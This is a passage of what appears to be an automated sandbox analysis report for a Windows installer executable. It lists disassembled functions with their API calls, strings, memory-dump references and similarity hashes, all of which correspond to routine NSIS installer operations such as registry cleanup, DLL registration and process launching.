                                                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                              Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                              Strings
                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                              • API String ID: 3294113728-3145124454
                                                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                              Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                              Strings
                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                              • `G, xrefs: 0040246E
                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                              • API String ID: 1033533793-4193110038
                                                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                              Function 0040324C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                              • MulDiv.KERNEL32(0002C600,00000064,006F2566), ref: 00403295
                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: f%o$verifying installer: %d%%
                                                                                              • API String ID: 1451636040-1305408406
                                                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                              Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                              Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                              Strings
                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                              • API String ID: 2014279497-3433828417
                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                              Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                              Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":
                                                                                              • API String ID: 589700163-165019052
                                                                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                              Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                              Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                              Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                              Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                              • wsprintfW.USER32 ref: 00404483
                                                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                              • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                              Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                              Memory Dump Source
